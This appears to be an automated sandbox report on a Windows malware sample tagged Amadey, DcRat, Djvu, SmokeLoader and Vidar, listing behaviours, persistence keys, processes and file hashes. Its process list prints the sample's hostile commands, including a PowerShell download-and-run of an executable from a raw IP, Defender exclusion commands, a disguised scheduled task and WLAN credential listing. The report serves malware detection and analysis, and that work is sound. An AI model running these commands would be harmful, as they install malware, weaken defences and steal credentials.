Malware Analysis Report

2025-01-02 11:07

Sample ID 240315-bb6wbacf2z
Target 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
SHA256 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
Tags amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50

Threat Level: Known bad

The file 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 was found to be: Known bad.

Malicious Activity Summary

DcRat

Amadey

Detected Djvu ransomware

Djvu Ransomware

SmokeLoader

Detect Vidar Stealer

Vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Downloads MZ/PE file

Modifies file permissions

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Deletes itself

Loads dropped DLL

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-03-15 00:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-03-15 00:59
Reported 2024-03-15 01:04
Platform win7-20240221-en
Max time kernel 303s
Max time network 270s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
File created C:\Windows\Tasks\explorgu.job C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\igrvrtd N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\igrvrtd N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\igrvrtd N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igrvrtd N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2400 wrote to memory of 2468 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\igrvrtd
PID 1196 wrote to memory of 2380 N/A N/A C:\Windows\system32\cmd.exe
PID 2380 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1196 wrote to memory of 2572 N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2456 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Windows\SysWOW64\icacls.exe
PID 2456 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2312 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 2312 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
PID 2128 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {6B9E4C8B-2F6A-46C1-BECC-EDF750FC0F99} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\igrvrtd

C:\Users\Admin\AppData\Roaming\igrvrtd

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\F49C.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\190491e8-0589-47c4-8568-05aca41dbeb1" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\4912.exe

"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4912.exe

"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1404

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\DFB7.exe

C:\Users\Admin\AppData\Local\Temp\DFB7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 124

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\E9F5.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7D2.exe

C:\Users\Admin\AppData\Local\Temp\7D2.exe

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

C:\Users\Admin\AppData\Local\Temp\61F4.exe

C:\Users\Admin\AppData\Local\Temp\61F4.exe

C:\Users\Admin\AppData\Local\Temp\70C4.exe

C:\Users\Admin\AppData\Local\Temp\70C4.exe

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\461186416230_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network


Files

C:\Users\Admin\AppData\Roaming\igrvrtd

C:\Users\Admin\AppData\Local\Temp\F49C.bat

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\CabA43B.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/2312-107-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-108-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-110-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-114-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-117-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-116-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-118-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe

MD5 47704f454af8641dac1af2e2768d7881
SHA1 e3341bfdec84f69684aecde18cab2864519c7728
SHA256 a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64
SHA512 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25

memory/568-135-0x0000000000260000-0x0000000000360000-memory.dmp

memory/568-136-0x0000000000730000-0x0000000000761000-memory.dmp

memory/2128-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2128-138-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2128-141-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2128-142-0x0000000000400000-0x0000000000644000-memory.dmp

\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/2312-153-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar5BC8.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar5D54.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/1548-201-0x0000000000C50000-0x0000000000D50000-memory.dmp

memory/2808-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1548-202-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2808-204-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2808-207-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2808-208-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2128-210-0x0000000000400000-0x0000000000644000-memory.dmp

memory/1868-227-0x0000000000230000-0x0000000000330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DFB7.exe

MD5 9e52aa572f0afc888c098db4c0f687ff
SHA1 ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b
SHA256 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443
SHA512 d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62

memory/2684-235-0x0000000000A60000-0x0000000001745000-memory.dmp

memory/2684-244-0x0000000000A60000-0x0000000001745000-memory.dmp

memory/2684-273-0x00000000001D0000-0x00000000001D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\DFB7.exe

MD5 e2ebfec64d8bd97a0f742ca80c58a2cf
SHA1 647ba7618ef94e1faf9c7bd6697a3672ce59ce51
SHA256 d26e2bdc1d1ea864335e8f261f48cfd9628eaf25f9414af05e59f780cdbbde4a
SHA512 e9839a52637945d078bb54c5dcefdbc7094b5753215cac9c1053f1d34a1d833b52ff31fe0935076cdad0616fd73338ed40269462f2323373084ebf44bb8a481a

\Users\Admin\AppData\Local\Temp\7D2.exe

MD5 d8133933c35b3641839b23fd75109c45
SHA1 a80e7473903a2d79fac4198bb5a80fc6ea968c87
SHA256 9393404a775a29519a48dedcefc783a2063e69a2c66cf106d23fa4d1c60ae547
SHA512 9bfdc4fdeaeb87c737aeb54ee0575a2bb1e0e13636a173e144f97559c88d05971910c7f3c569ba8a361eea349960eaf1066c41afafa4b4b35f8c91bdd20f66a4

C:\Users\Admin\AppData\Local\Temp\7D2.exe

MD5 450039a02217c53bd983eaf1fd34505a
SHA1 930ed58a2f58ca7bf3e39aaee43fb541f1c6eeda
SHA256 d2eacbc922f248856b860aa7c31476ae4123f97e82cf69760ef216d9dca321f0
SHA512 cf37a82ea7b64f4633ac82c73feff3f829dda279a7caeac32a4cde7b0f82a43b37f67e620677a87d2eccc0eee6f8d68d0175a086487b2174b4f30b66aa4fb080

memory/2684-297-0x0000000000A60000-0x0000000001745000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

MD5 efc1577f95c9a449fcaf9c8c4ba97486
SHA1 9f8c996d0b1d5994449e32e32ec5b29af4f62b70
SHA256 6ab35dffd2a577d4e2478bcfa21fd1d17fc498c57582e0caaa518ecdf5c4c037
SHA512 c97fa8c4773d9f2058ca777a4a5d786ed9c5271f15553fd66cd2b50d3edbfda4af86cd0108aa291f6373e27e7f699dd36f9537b8041044492a03bbf2c7295ba2

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

MD5 bb2197a07962bd9e84512680932621a2
SHA1 82c0278ced2d0b9241b13860f45fc499033a0956
SHA256 ca83b6d4ac408784b71721c0b97981a55cdf14431c8754c232f77450d4254094
SHA512 04bdf960039d489bd79bfdb6590beb2d75ebce068abd0b5726852be401b52961c60062920e40e3ad8d1ccc1fea3204f4c85d02702b2b4796a32a7a79afb2aded

memory/668-307-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/668-308-0x0000000076FA0000-0x0000000076FA2000-memory.dmp

memory/668-309-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/668-310-0x0000000002210000-0x0000000002212000-memory.dmp

memory/668-312-0x0000000000940000-0x0000000000941000-memory.dmp

memory/668-311-0x0000000002330000-0x0000000002331000-memory.dmp

memory/668-313-0x0000000002470000-0x0000000002471000-memory.dmp

memory/668-315-0x00000000008C0000-0x00000000008C1000-memory.dmp

memory/668-316-0x0000000000930000-0x0000000000931000-memory.dmp

memory/668-314-0x0000000000560000-0x0000000000561000-memory.dmp

memory/668-317-0x0000000002460000-0x0000000002461000-memory.dmp

memory/668-319-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/668-318-0x00000000008B0000-0x00000000008B1000-memory.dmp

memory/668-320-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/668-321-0x0000000002480000-0x0000000002481000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\61F4.exe

MD5 0de19cd17462ea79db1a5e5fd1d7f59f
SHA1 d2b313dcfbda9a04475fc01182336b52846bbe3b
SHA256 c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b
SHA512 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

memory/2952-333-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2952-334-0x0000000001BD0000-0x0000000001C3F000-memory.dmp

memory/2952-335-0x0000000000400000-0x00000000004AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\70C4.exe

MD5 f727c0754ddda4ed6354375ab748735b
SHA1 2ad7d52a12f896817edfe511ec26212580dc5958
SHA256 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899
SHA512 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3

memory/832-341-0x0000000072880000-0x0000000072F6E000-memory.dmp

memory/832-340-0x0000000000800000-0x000000000089A000-memory.dmp

memory/668-347-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/2952-349-0x00000000026A0000-0x00000000026A1000-memory.dmp

memory/2952-358-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/668-359-0x0000000000570000-0x0000000000571000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

MD5 98a8cb3f57539407ce621d4c6e7eca22
SHA1 cfba7b6935b6d3ccc0c468df459c9833d49fe287
SHA256 a89c33a00af285e59bf6d0c4fa32d71a7bfac103c9f69e3ec80afa84e2aa08da
SHA512 66738703799be176d5a086ed48ceac9499a88c9a2bf4b1a588f185de6f615cbc84568c07a7eb6fb3f7d5569f223a7d0f6bf49f7a44643452fabc1c22fd1efeeb

memory/668-364-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/668-366-0x0000000002770000-0x0000000002771000-memory.dmp

memory/668-367-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/832-370-0x0000000009270000-0x00000000092B0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2832-377-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-378-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-379-0x0000000002680000-0x00000000026C0000-memory.dmp

memory/2832-380-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-381-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-382-0x0000000002680000-0x00000000026C0000-memory.dmp

memory/2832-383-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2832-384-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2932-386-0x00000000005D0000-0x00000000006D0000-memory.dmp

